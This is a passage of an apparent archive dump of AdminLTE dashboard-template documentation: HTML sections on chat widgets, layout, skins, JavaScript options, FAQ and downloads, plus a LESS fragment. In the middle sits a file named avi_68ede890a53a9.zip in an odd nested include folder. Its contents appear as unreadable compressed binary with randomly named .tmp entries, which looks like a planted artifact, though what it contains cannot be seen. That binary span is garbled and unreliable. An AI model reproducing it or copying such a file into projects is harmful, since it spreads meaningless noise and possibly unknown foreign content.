            &LT;img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
            &LT;div class="contacts-list-info">
              &LT;span class="contacts-list-name">
                Count Dracula
                &LT;small class="contacts-list-date pull-right">2/28/2015&LT;/small>
              &LT;/span>
              &LT;span class="contacts-list-msg">How have you been? I was...&LT;/span>
            &LT;/div>&LT;!-- /.contacts-list-info -->
          &LT;/a>
        &LT;/li>&LT;!-- End Contact Item -->
      &LT;/ul>&LT;!-- /.contatcts-list -->
    &LT;/div>&LT;!-- /.direct-chat-pane -->
  &LT;/div>&LT;!-- /.box-body -->
  &LT;div class="box-footer">
    &LT;div class="input-group">
      &LT;input type="text" name="message" placeholder="Type Message ..." class="form-control">
      &LT;span class="input-group-btn">
        &LT;button type="button" class="btn btn-danger btn-flat">Send&LT;/button>
      &LT;/span>
    &LT;/div>
  &LT;/div>&LT;!-- /.box-footer-->
&LT;/div>&LT;!--/.direct-chat -->
</code></pre>

  <p>Of course you can use direct chat with a solid box by adding the class <code>solid-box</code> to the box. Here are a couple of examples:</p>

  <!-- Direct Chat With Solid Boxes -->
  <div class="row">
    <div class="col-md-6">
      <!-- DIRECT CHAT WARNING -->
      <div class="box box-primary box-solid direct-chat direct-chat-primary">
        <div class="box-header">
          <h3 class="box-title">Direct Chat in a Solid Box</h3>
          <div class="box-tools pull-right">
            <span data-toggle="tooltip" title="3 New Messages" class="badge bg-light-blue">3</span>
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle"><i class="fa fa-comments"></i></button>
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div>
        </div><!-- /.box-header -->
        <div class="box-body">
          <!-- Conversations are loaded here -->
          <div class="direct-chat-messages">
            <!-- Message. Default to the left -->
            <div class="direct-chat-msg">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-left">Alexander Pierce</span>
                <span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                Is this template really for free? That's unbelievable!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->

            <!-- Message to the right -->
            <div class="direct-chat-msg right">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-right">Sarah Bullock</span>
                <span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                You better believe it!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->
          </div><!--/.direct-chat-messages-->

          <!-- Contacts are loaded here -->
          <div class="direct-chat-contacts">
            <ul class="contacts-list">
              <li>
                <a href="#">
                  <img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
                  <div class="contacts-list-info">
                    <span class="contacts-list-name">
                      Count Dracula
                      <small class="contacts-list-date pull-right">2/28/2015</small>
                    </span>
                    <span class="contacts-list-msg">How have you been? I was...</span>
                  </div><!-- /.contacts-list-info -->
                </a>
              </li><!-- End Contact Item -->
            </ul><!-- /.contatcts-list -->
          </div><!-- /.direct-chat-pane -->
        </div><!-- /.box-body -->
        <div class="box-footer">
          <form action="#" method="post">
            <div class="input-group">
              <input type="text" name="message" placeholder="Type Message ..." class="form-control">
              <span class="input-group-btn">
                <button type="button" class="btn btn-primary btn-flat">Send</button>
              </span>
            </div>
          </form>
        </div><!-- /.box-footer-->
      </div><!--/.direct-chat -->
    </div><!-- /.col -->

    <div class="col-md-6">
      <!-- DIRECT CHAT DANGER -->
      <div class="box box-info box-solid direct-chat direct-chat-info">
        <div class="box-header">
          <h3 class="box-title">Direct Chat in a Solid Box</h3>
          <div class="box-tools pull-right">
            <span data-toggle="tooltip" title="3 New Messages" class="badge bg-aqua">3</span>
            <button class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i></button>
            <button class="btn btn-box-tool" data-toggle="tooltip" title="Contacts" data-widget="chat-pane-toggle"><i class="fa fa-comments"></i></button>
            <button class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button>
          </div>
        </div><!-- /.box-header -->
        <div class="box-body">
          <!-- Conversations are loaded here -->
          <div class="direct-chat-messages">
            <!-- Message. Default to the left -->
            <div class="direct-chat-msg">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-left">Alexander Pierce</span>
                <span class="direct-chat-timestamp pull-right">23 Jan 2:00 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user1-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                Is this template really for free? That's unbelievable!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->

            <!-- Message to the right -->
            <div class="direct-chat-msg right">
              <div class="direct-chat-info clearfix">
                <span class="direct-chat-name pull-right">Sarah Bullock</span>
                <span class="direct-chat-timestamp pull-left">23 Jan 2:05 pm</span>
              </div><!-- /.direct-chat-info -->
              <img class="direct-chat-img" src="../dist/img/user3-128x128.jpg" alt="message user image"><!-- /.direct-chat-img -->
              <div class="direct-chat-text">
                You better believe it!
              </div><!-- /.direct-chat-text -->
            </div><!-- /.direct-chat-msg -->
          </div><!--/.direct-chat-messages-->

          <!-- Contacts are loaded here -->
          <div class="direct-chat-contacts">
            <ul class="contacts-list">
              <li>
                <a href="#">
                  <img class="contacts-list-img" src="../dist/img/user1-128x128.jpg" alt="Contact Avatar">
                  <div class="contacts-list-info">
                    <span class="contacts-list-name">
                      Count Dracula
                      <small class="contacts-list-date pull-right">2/28/2015</small>
                    </span>
                    <span class="contacts-list-msg">How have you been? I was...</span>
                  </div><!-- /.contacts-list-info -->
                </a>
              </li><!-- End Contact Item -->
            </ul><!-- /.contatcts-list -->
          </div><!-- /.direct-chat-pane -->
        </div><!-- /.box-body -->
        <div class="box-footer">
          <form action="#" method="post">
            <div class="input-group">
              <input type="text" name="message" placeholder="Type Message ..." class="form-control">
              <span class="input-group-btn">
                <button type="button" class="btn btn-info btn-flat">Send</button>
              </span>
            </div>
          </form>
        </div><!-- /.box-footer-->
      </div><!--/.direct-chat -->
    </div><!-- /.col -->
  </div><!-- /.row -->
</section>
include/dependencies.html000066400000001033152434262030011503 0ustar00<section id="dependencies">
  <h2 class="page-header"><a href="#dependencies">Dependencies</a></h2>
  <p class="lead">AdminLTE depends on two main frameworks.
    The downloadable package contains both of these libraries, so you don't have to manually download them.</p>
  <ul class="bring-up">
    <li><a href="http://getbootstrap.com" target="_blank">Bootstrap 3</a></li>
    <li><a href="http://jquery.com/" target="_blank">jQuery 1.11+</a></li>
    <li><a href="#plugins">All other plugins are listed below</a></li>
  </ul>
</section>
include/advice.html000066400000003552152434262030010320 0ustar00<section id="advice">
  <h2 class="page-header"><a href="#advice">A Word of Advice</a></h2>
  <p class="lead">
    Before you go to see your new awesome theme, here are few tips on how to familiarize yourself with it:
  </p>

  <ul>
    <li><b>AdminLTE is based on <a href="http://getbootstrap.com/" target="_blank">Bootstrap 3</a>.</b> If you are unfamiliar with Bootstrap, visit their website and read through the documentation. All of Bootstrap components have been modified to fit the style of AdminLTE and provide a consistent look throughout the template. This way, we guarantee you will get the best of AdminLTE.</li>
    <li><b>Go through the pages that are bundled with the theme.</b> Most of the template example pages contain quick tips on how to create or use a component which can be really helpful when you need to create something on the fly.</li>
    <li><b>Documentation.</b> We are trying our best to make your experience with AdminLTE be smooth. One way to achieve that is to provide documentation and support. If you think that something is missing from the documentation, please do not hesitate to create an issue to tell us about it. Also, if you would like to contribute, email the support team at <a href="mailto:support@almsaeedstudio.com">support@almsaeedstudio.com</a>.</li>
    <li><b>Built with <a href="http://lesscss.org/" target="_blank">LESS</a>.</b> This theme uses the LESS compiler to make it easier to customize and use. LESS is easy to learn if you know CSS or SASS. It is not necessary to learn LESS but it will benefit you a lot in the future.</li>
    <li><b>Hosted on <a href="https://github.com/almasaeed2010/AdminLTE/" target="_blank">GitHub</a>.</b> Visit our GitHub repository to view issues, make requests, or contribute to the project.</li>
  </ul>
  <p>
    <b>Note:</b> LESS files are better commented than the compiled CSS file.
  </p>
</section>
include/introduction.html000066400000001431152434262030011600 0ustar00<section id="introduction">
  <h2 class="page-header"><a href="#introduction">Introduction</a></h2>
  <p class="lead">
    <b>AdminLTE</b> is a popular open source WebApp template for admin dashboards and control panels.
    It is a responsive HTML template that is based on the CSS framework Bootstrap 3.
    It utilizes all of the Bootstrap components in its design and re-styles many
    commonly used plugins to create a consistent design that can be used as a user
    interface for backend applications. AdminLTE is based on a modular design, which
    allows it to be easily customized and built upon. This documentation will guide you through
    installing the template and exploring the various components that are bundled with the template.
  </p>
</section><!-- /#introduction -->
include/layout.html000066400000010776152434262030010410 0ustar00<section id="layout">
  <h2 class="page-header"><a href="#layout">Layout</a></h2>
  <p class="lead">The layout consists of four major parts:</p>
  <ul>
    <li>Wrapper <code>.wrapper</code>. A div that wraps the whole site.</li>
    <li>Main Header <code>.main-header</code>. Contains the logo and navbar.</li>
    <li>Sidebar <code>.sidebar-wrapper</code>. Contains the user panel and sidebar menu.</li>
    <li>Content <code>.content-wrapper</code>. Contains the page header and content.</li>
  </ul>
  <div class="callout callout-danger lead">
    <h4>Tip!</h4>
    <p>The <a href="../starter.html">starter page</a> is a good place to start building your app if you'd like to start from scratch.</p>
  </div>

  <h3>Layout Options</h3>
  <p class="lead">AdminLTE 2.0 provides a set of options to apply to your main layout. Each on of these classes can be added
    to the body tag to get the desired goal.</p>
  <ul>
    <li><b>Fixed:</b> use the class <code>.fixed</code> to get a fixed header and sidebar.</li>
    <li><b>Collapsed Sidebar:</b> use the class <code>.sidebar-collapse</code> to have a collapsed sidebar upon loading.</li>
    <li><b>Boxed Layout:</b> use the class <code>.layout-boxed</code> to get a boxed layout that stretches only to 1250px.</li>
    <li><b>Top Navigation</b> use the class <code>.layout-top-nav</code> to remove the sidebar and have your links at the top navbar.</li>
  </ul>
  <p><b>Note:</b> you cannot use both layout-boxed and fixed at the same time. Anything else can be mixed together.</p>

  <h3>Skins</h3>
  <p class="lead">Skins can be found in the dist/css/skins folder.
    Choose and the skin file that you want then add the appropriate
    class to the body tag to change the template's appearance. Here is the list of available skins:</p>
  <div class="box box-solid" style="max-width: 300px;">
    <div class="box-body no-padding">
      <table id="layout-skins-list" class="table table-striped bring-up nth-2-center">
        <thead>
          <tr>
            <th style="width: 210px;">Skin Class</th>
            <th>Preview</th>
          </tr>
        </thead>
        <tbody>
          <tr>
            <td><code>skin-blue</code></td>
            <td><a href="#" data-skin="skin-blue" class="btn btn-primary btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-blue-light</code></td>
            <td><a href="#" data-skin="skin-blue-light" class="btn btn-primary btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-yellow</code></td>
            <td><a href="#" data-skin="skin-yellow" class="btn btn-warning btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-yellow-light</code></td>
            <td><a href="#" data-skin="skin-yellow-light" class="btn btn-warning btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-green</code></td>
            <td><a href="#" data-skin="skin-green" class="btn btn-success btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-green-light</code></td>
            <td><a href="#" data-skin="skin-green-light" class="btn btn-success btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-purple</code></td>
            <td><a href="#" data-skin="skin-purple" class="btn bg-purple btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-purple-light</code></td>
            <td><a href="#" data-skin="skin-purple-light" class="btn bg-purple btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-red</code></td>
            <td><a href="#" data-skin="skin-red" class="btn btn-danger btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-red-light</code></td>
            <td><a href="#" data-skin="skin-red-light" class="btn btn-danger btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-black</code></td>
            <td><a href="#" data-skin="skin-black" class="btn bg-black btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
          <tr>
            <td><code>skin-black-light</code></td>
            <td><a href="#" data-skin="skin-black-light" class="btn bg-black btn-xs"><i class="fa fa-eye"></i></a></td>
          </tr>
        </tbody>
      </table>
    </div><!-- /.box-body -->
  </div><!-- /.box -->
</section>
include/include/avi_68ede890a53a9.zip000064400000012637152434262030013126 0ustar00PK�pN[��@��b_68ede890a53a9.tmp�Umo�8�+V��D�8q�\�N��](tۢ�`J�h-q���q6/���dc���̌��_���
U^�~< 	�P<!�gT�A�h�;�&V��PE$�Ne�C���rk�N��|C��e���v*�U3�)2�-�.c�=�(��b��(�v�3��݊�@.��&��e�MGG��qT�b��膘���,��DW�O5��4ji�G�X3!c˘��Gb�e�]'���P��-���^b�3����L�g+
��!�'������-C*
��{�z������y�Yq�~ŭ�j��O�嶻���^�V~�׈��:��G�M��2D�`��u=+��-�=��f�=�n�%�9fGܛ�����t��/'�
	��s�j2X@�.#�3$&>�U��U����۶�lH�K��Y���Y�FT�F�7Q�y���)���Z���a
�]#I6ڞ�7M����� �ܖU�I�4^�@�W��w�����A����*�I���/8��~�&e���*މ�PB�Y<^t���W.�<�~$��P
òa�	�
��&N$jA�%k#�sm��}�eb��\+T���z���:�eZ��d6���=J��8�ydifQ�ry.��\c*�,��`���e�u�ʧ�鹄W"�[�ήX�D�8��x�j��R�ₔ(	v���TbZ����Z8��<yœW٫͟"\'��Z�/w�:�u�uL��Ѕ������q�[��p�o[_��聡�����b���G7�~�n�*�7�
���>��eȊ[M8��[�?�;�.kH%?C��8�PFPV����
r�����D��F���mc4b��wZ�Y!���BS��%	� EB^8A�Ǥ`����
��cS�PU�&��y�N|u��ԫ��iP���4?�S`ݬ��������R���4? H�F4�S�1z|�ڊ�NO�PK�pN[Of��c_68ede890a53a9.tmp]x��H��_�h��"�䙻[�mɔ�v�A�{�a��V;,�@"�IFDFf�x���ߧj���<��������G,�~t�_�k�T�.�a�$���N��'��G{�A�mX��|�\q�+?�逩q_�'|��Ã6b��i���_~�����q��Jp,C�Drt�k�V[�	I��M�"
%�����́�řyu�N0zq��*d)�1Ug~�ڙWwCg�$�/�W&�S����
�+��W�-�!�;
�`�^d�5��G�;ϓ/ڋ̢��OrH(R�l�w�D}�N=��(�s�ũ�l�c~��y�#��u"�U˪���h����nP8�L��3}��i�X��
��o���D�~{��D,+zf�Q\�.7ٖ��~<w�1�
�Z���M�-�P��lH�&�����n^ގ��T�>���4���e�D�y��"����-8����,f�lk����[�@2��R&��m�ĥ��R�͢���ZlD�Y!��A,J�fS5t�=Uw�۬�6��zѺ���D:�+�Oe��eTY$�+�ZY�=g��f�Qa?۰w#����]��1�fa��3��a�ؓ�洿V�5P���N�L��7<�D��}�:2�<�m�GU>B6۵�@r!�wZ�D%�Z(�y�+�d?�Q�i8ӽp>��w��hp[�
�Ʀ�!��%�	0�z�QUj�z�1
X��}_6laޗ���k��72@�OjZf�"�k����/�S�|�-�<��9���gL:MVi--G	�ۘ2U��9%Û���n�������e��b'W�!/ǵ�}��q�oz�A`T��ͬNV�M�g�Q	c1g5�:�\��J7�:h���E�����cf[��"i��%�cT��)�{�9��7U�_S{��]��%�gp�[D��}���]e�r��N�$��U~6���^���_�sT�A{�h5��Xi�]�f\��M����}=Z�q�/�*�^����A�X�Տ�[Qn���zl��m��V�yk�rQO�;!>���՟8�
W�ڧ��5�<Ґ�,m��xZm=8�9��b˫�ܤ�rrN5}�`��;FZl�2� �/��s��l�Q���O�w��(��p]��՗)�Q(������l���h��ʅ�1V�?|ʭ.���C�X�b ˒���&k0����p>h���*a��.�����sߝ�#^������䨸Q��O2+��3c`D��w�ҽ�a>��5x�7,3����	A���e̩^/�%,~dE�m��{�hQۅr2�r����K,,��T�4�NrrXa��W�=�>�:���M̏�m�d�z�a9\z�5M�-g�';�����8��< ���n�%=z���5a�z`�.l'm�@TPC�
�&�}i�Ff��D�QKOy�o6��$�E�J����N���LΒA��Jx2�DrO��\�w�!��*���4=:8�<i�Q�sY�qF�2	�Sl]97����wq����:baG��Ƿf�
�}4��j�`�k�xK7ܾ����Ox�4�u��}3�h������\X_����1���a��a��tl��;�y�)ﴣ{D��ޢ�`��q��%A���#|��� <�zI��6�jٺ(Yz�ʷ|���M���X����T��O���8�E&�R�ܝ��
�٭��x~�މN��|D�I�5!�S���r��Y8�5��e&���B�� ʊ �Y����偃�`l"�#Y3,+�8����O�z�š�ϲ�eU@���(��S���0٨q�:���Y��(�	���()7>-�z	�-u���q3�Y�z��p�EɥKo��-�Z+���&�4�W��	U�Y�d��7�k��H��֢EL)�u�� ?R�i2��EA��2�B��5A���|0.���y�@�2@��w"(�k�ntc�7�S=l��yaY�J"&��y,a��eo٫ɛ�Z笭
��2����+��k��Ϙ�WB%�%*��e��V�~�Z{�k���u�f�WLO<�c�x��L��{�c0���&�ᐢLY$��o~$�dx�,�?D��5d2P��k��^I�š���	r�UwW��p�V��S����	��@I#�F@�O�#��i:ŀ��ևh�
��>����4�D�"�@��Z�x�����c����(a3e�z�C�cx��:�����l��0bi��v!�1I�ͨ�M?��p�JzA���0[kV
%<����4�4��I&���#iߑo�	�����ԝ��-՞�'��WЋ8��)z])ҕ�i��>�~`����P��m�f�G��7''�C�ڍ$���G��3�ގ��eOubL����a_Z��q�n³[�`Ы��<.4§9Cb�	Eh��B���ӈ����+��y�ح>5�
��Y@�LLW���z`��R�Ɔ�S+�D��&�ZBH���?�(�o	>�w����� ȵP�lj�b�Iyp�����Qh�Jp�zx\Y����ݳ#�n�V-͞`�th�1��",)\~����������eV��u�Q����ޤAD.&�)�!��V��k�>��2Q��e�A��w�(�,z���{���Z���VL�9"�/�f^���l�;���q�`���j�Yג3�b�O�Z�Um��P�	���Yf����&�Ш�	��,�'�@�;SS�A��cߜ� ��pW�&}S�N搲�"e�>��=��_�����Z985�N�
%��4�[sA�ܤs�<�2�w	#y�p�R��=���������.��]���KY��8B�Z����G��迬�K���=�VB���8��
XKA�D'B��ڱ�@���ļ�myQ{�������>Ç��h��:�!���pC1��3�ۧ�T>��2~F����r�:c�e�"���
<"����@��z�����)x�`���c3=�>���R�T���rD�Wj��\�/3�T�q�ҙr����W�O\��ݴ��p,B����1���c�6D�s�E�ꓻ���m𴟤���l��@��
�)A��N�9M�� g�OXځ���uڕ	5@:D�{~Dw��ܓ5x�<�.�Sd�����)7~���5W���{��5�q��/��˛Ex�S�H��9�0�>!��q��0xձ\Y����w���e'���A�:�RH��`��8
#Kv��%�5�z��#�%$>��2���!��`�b�cǓOԣ�������qf���L�o��`�'��׉�_���Õ�3��~�7�:�n�XD�L�%�LX[X����L���O�O�jʷ��1�_3��uh	�(�3)yKE�`�r�Ȅ���ːD�z�
ߢ�����K�#�eF
U�	��"��,���L<�<="ӄL�<{xn|��3̻�1�Ù��cJ�����2�(�3E��!x�u��o~�ъ�ϳ�81ʽN�F�6k`W�s��+a�ݏ��෬�D6��7�$q�h��0�6ꋠ"v'�F@4��c�6".��5�Gwy;�M_���Fp��_E�n�t��B+����Dg�U!�ȟ�B	��<�����˜��p�JH��D���5j;��4ŞA���/q6�_�Ī͡`<���cG�C ��t��b+�(1��?n:Ga�뉤�%��_`��7?��I��9��
�7e�ȁ�~lO�Đ�b���q0
�!@�D�p���/��ZcU͝�g�͆-Nj���[8�����1��6s��x��ҷ��!�Zf��s��	0����U>�0�}��vx��%����겯��f���,�Z��9�M�e=�~�P\8BU��J�Ao����x�� ��ՊA<n�8����Y�Y���0�</��b[���D6M��{K�������X@2��G�"�I9���H�;��4�(
��b�|	T9Ȥ���H��lY,�RD-���@�?/�}H�z~�c���B��?���{�_����`��ۅ��v�����}��i#�~��_�_��?�2���~�l�
���?~�?~`����$*�w8��G�����R�ן%�e��\z]�?��{�~��?~~�y��^�o,���Ͽd&�۶��������_?u��۟k��l�,�
݇��n>�w����<�Ɵ���R��}3��H(�}�3^5�Ͱ���$RK?����N[g�P�Ɠ��ʺү��T�q�[���:�iwi/뿖Z>�Pt����k����?����PK?�pN[��@����b_68ede890a53a9.tmpPK?�pN[Of�����c_68ede890a53a9.tmpPK�include/browsers.html000066400000000731152434262030010727 0ustar00<section id="browsers">
  <h2 class="page-header"><a href="#browsers">Browser Support</a></h2>
  <p class="lead">AdminLTE supports the following browsers:</p>
  <ul>
    <li>IE9+</li>
    <li>Firefox (latest)</li>
    <li>Safari (latest)</li>
    <li>Chrome (latest)</li>
    <li>Opera (latest)</li>
  </ul>
  <p><b>Note:</b> IE9 does not support transitions or animations. The template will function properly but it won't use animations/transitions on IE9.</p>
</section>
include/license.html000066400000000750152434262030010504 0ustar00<section id="license">
  <h2 class="page-header"><a href="#license">License</a></h2>
  <h3>AdminLTE</h3>
  <p class="lead">
    AdminLTE is an open source project that is licensed under the <a href="http://opensource.org/licenses/MIT">MIT license</a>.
    This allows you to do pretty much anything you want as long as you include
    the copyright in "all copies or substantial portions of the Software."
    Attribution is not required (though very much appreciated).
  </p>
</section>
include/adminlte-options.html000066400000010141152434262030012343 0ustar00<section id="adminlte-options">
  <h2 class="page-header"><a href="#adminlte-options">AdminLTE Javascript Options</a></h2>
  <p class="lead">Modifying the options of AdminLTE's app.js can be done using one of the following ways.</p>

  <h3>Editing app.js</h3>
  <p>Within the main Javascript file, modify the <code>$.AdminLTE.options</code> object to suit your use case.</p>

  <h3>Defining AdminLTEOptions</h3>
  <p>Alternatively, you can define a global options variable named <code>AdminLTEOptions</code> and initialize it before loading app.js.</p>
  <p>Example</p>
  <pre class="prettyprint"><code class="html">&LT;script>
  var AdminLTEOptions = {
    //Enable sidebar expand on hover effect for sidebar mini
    //This option is forced to true if both the fixed layout and sidebar mini
    //are used together
    sidebarExpandOnHover: true,
    //BoxRefresh Plugin
    enableBoxRefresh: true,
    //Bootstrap.js tooltip
    enableBSToppltip: true
  };
&LT;/script>
&LT;script src="dist/js/app.js" type="text/javascript">&LT;/script></code></pre>

  <h3>Available AdminLTE Options</h3>
  <pre class="prettyprint"><code class="javascript">{
  //Add slimscroll to navbar menus
  //This requires you to load the slimscroll plugin
  //in every page before app.js
  navbarMenuSlimscroll: true,
  navbarMenuSlimscrollWidth: "3px", //The width of the scroll bar
  navbarMenuHeight: "200px", //The height of the inner menu
  //General animation speed for JS animated elements such as box collapse/expand and
  //sidebar treeview slide up/down. This options accepts an integer as milliseconds,
  //'fast', 'normal', or 'slow'
  animationSpeed: 500,
  //Sidebar push menu toggle button selector
  sidebarToggleSelector: "[data-toggle='offcanvas']",
  //Activate sidebar push menu
  sidebarPushMenu: true,
  //Activate sidebar slimscroll if the fixed layout is set (requires SlimScroll Plugin)
  sidebarSlimScroll: true,
  //Enable sidebar expand on hover effect for sidebar mini
  //This option is forced to true if both the fixed layout and sidebar mini
  //are used together
  sidebarExpandOnHover: false,
  //BoxRefresh Plugin
  enableBoxRefresh: true,
  //Bootstrap.js tooltip
  enableBSToppltip: true,
  BSTooltipSelector: "[data-toggle='tooltip']",
  //Enable Fast Click. Fastclick.js creates a more
  //native touch experience with touch devices. If you
  //choose to enable the plugin, make sure you load the script
  //before AdminLTE's app.js
  enableFastclick: true,
  //Control Sidebar Options
  enableControlSidebar: true,
  controlSidebarOptions: {
    //Which button should trigger the open/close event
    toggleBtnSelector: "[data-toggle='control-sidebar']",
    //The sidebar selector
    selector: ".control-sidebar",
    //Enable slide over content
    slide: true
  },
  //Box Widget Plugin. Enable this plugin
  //to allow boxes to be collapsed and/or removed
  enableBoxWidget: true,
  //Box Widget plugin options
  boxWidgetOptions: {
    boxWidgetIcons: {
      //Collapse icon
      collapse: 'fa-minus',
      //Open icon
      open: 'fa-plus',
      //Remove icon
      remove: 'fa-times'
    },
    boxWidgetSelectors: {
      //Remove button selector
      remove: '[data-widget="remove"]',
      //Collapse button selector
      collapse: '[data-widget="collapse"]'
    }
  },
  //Direct Chat plugin options
  directChat: {
    //Enable direct chat by default
    enable: true,
    //The button to open and close the chat contacts pane
    contactToggleSelector: '[data-widget="chat-pane-toggle"]'
  },
  //Define the set of colors to use globally around the website
  colors: {
    lightBlue: "#3c8dbc",
    red: "#f56954",
    green: "#00a65a",
    aqua: "#00c0ef",
    yellow: "#f39c12",
    blue: "#0073b7",
    navy: "#001F3F",
    teal: "#39CCCC",
    olive: "#3D9970",
    lime: "#01FF70",
    orange: "#FF851B",
    fuchsia: "#F012BE",
    purple: "#8E24AA",
    maroon: "#D81B60",
    black: "#222222",
    gray: "#d2d6de"
  },
  //The standard screen sizes that bootstrap uses.
  //If you change these in the variables.less file, change
  //them here too.
  screenSizes: {
    xs: 480,
    sm: 768,
    md: 992,
    lg: 1200
  }
}</code></pre>
</section>
include/faq.html000066400000002253152434262030007631 0ustar00<section id="faq">
  <h2 class="page-header"><a href="#faq">FAQ</a></h2>
  <h3>Can AdminLTE be used with Wordpress?</h3>
  <p class="lead">AdminLTE is an HTML template that can be used for any purpose. However, it is not made to be easily installed on Wordpress. It will require some effort and enough knowledge of the Wordpress script to do so.</p>

  <h3>Is there an integration guide for PHP frameworks such as Yii or Symfony?</h3>
  <p class="lead">Short answer, no. However, there are forks and tutorials around the web that provide info on how to integrate with many different frameworks. There are even versions of AdminLTE that are integrated with jQuery ajax, AngularJS and/or MVC5 ASP .NET.</p>

  <h3>How do I get notified of new AdminLTE versions?</h3>
  <p class="lead">The best option is to subscribe to our mailing list using the <a href="http://almsaeedstudio.com/#subscribe">subscription form on Almsaeed Studio</a>.
    If that's not appealing to you, you may watch the <a href="https://github.com/almasaeed2010/AdminLTE">repository on Github</a> or visit <a href="http://almsaeedstudio.com">Almsaeed Studio</a> every now and then for updates and announcements.</p>
</section>
include/implementations.html000066400000003331152434262030012270 0ustar00<section id="implementations">
  <h2 class="page-header"><a href="#implementations">Implementations</a></h2>
  <p class="lead">Thanks to many of AdminLTE users, there are multiple implementations of the template
  for easy integration with back-end frameworks. The following are some of them:</p>

  <ul>
    <li><a href="https://github.com/mmdsharifi/AdminLTE-RTL">Persian RTL</a> by <a href="https://github.com/mmdsharifi">Mohammad Sharifi</a></li>
    <li><a href="https://github.com/dmstr/yii2-adminlte-asset" target="_blank">Yii 2</a> by <a href="https://github.com/schmunk42" target="_blank">Tobias Munk</a></li>
    <li><a href="https://github.com/yajra/laravel-admin-template" target="_blank">Laravel</a> by <a href="https://github.com/yajra" target="_blank">Arjay Angeles</a></li>
    <li><a href="https://github.com/avanzu/AdminThemeBundle" target="_blank">Symfony</a> by <a href="https://github.com/avanzu" target="_blank">Marc Bach</a></li>
    <li>Rails gems: <a href="https://github.com/nicolas-besnard/adminlte2-rails" target="_blank">adminlte2-rails</a> by <a href="https://github.com/nicolas-besnard" target="_blank">Nicolas Besnard</a> and <a href="https://github.com/racketlogger/lte-rails" target="_blank">lte-rails</a> (using AdminLTE sources) by <a href="https://github.com/racketlogger" target="_blank">Carlos at RacketLogger</a></li>
  </ul>

  <p><b class="text-red">Note:</b> these implementations are not supported by Almsaeed Studio. However,
    they do provide a good example of how to integrate AdminLTE into different frameworks. For the latest release
    of AdminLTE, please visit our <a href="https://github.com/almasaeed2010/AdminLTE">repository</a> or <a href="https://almsaeedstudio.com">website</a></p>
</section>
include/download.html000066400000004217152434262030010673 0ustar00<section id="download">
  <h2 class="page-header"><a href="#download">Download</a></h2>
  <p class="lead">
    AdminLTE can be downloaded in two different versions, each appealing to different skill levels and use case.
  </p>
  <div class="row">
    <div class="col-sm-6">
      <div class="box box-primary">
        <div class="box-header with-border">
          <h3 class="box-title">Ready</h3>
          <span class="label label-primary pull-right"><i class="fa fa-html5"></i></span>
        </div><!-- /.box-header -->
        <div class="box-body">
          <p>Compiled and ready to use in production. Download this version if you don't want to customize AdminLTE's LESS files.</p>
          <a href="http://almsaeedstudio.com/download/AdminLTE-dist" class="btn btn-primary"><i class="fa fa-download"></i> Download</a>
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div><!-- /.col -->
    <div class="col-sm-6">
      <div class="box box-danger">
        <div class="box-header with-border">
          <h3 class="box-title">Source Code</h3>
          <span class="label label-danger pull-right"><i class="fa fa-database"></i></span>
        </div><!-- /.box-header -->
        <div class="box-body">
          <p>All files including the compiled CSS. Download this version if you plan on customizing the template. <b>Requires a LESS compiler.</b></p>
          <a href="http://almsaeedstudio.com/download/AdminLTE" class="btn btn-danger"><i class="fa fa-download"></i> Download</a>
        </div><!-- /.box-body -->
      </div><!-- /.box -->
    </div><!-- /.col -->
  </div><!-- /.row -->
  <pre class="hierarchy bring-up"><code class="language-bash" data-lang="bash">File Hierarchy of the Source Code Package

AdminLTE/
├── dist/
│   ├── CSS/
│   ├── JS
│   ├── img
├── build/
│   ├── less/
│   │   ├── AdminLTE's Less files
│   └── Bootstrap-less/ (Only for reference. No modifications have been made)
│       ├── mixins/
│       ├── variables.less
│       ├── mixins.less
└── plugins/
    ├── All the customized plugins CSS and JS files</code></pre>
</section>
less/users-list.less000066400000001132152434265230010521 0ustar00/*
 * Component: Users List
 * ---------------------
 */
.users-list {
  &:extend(.list-unstyled);
  > li {
    width: 25%;
    float: left;
    padding: 10px;
    text-align: center;
    img {
      .border-radius(50%);
      max-width: 100%;
      height: auto;
    }
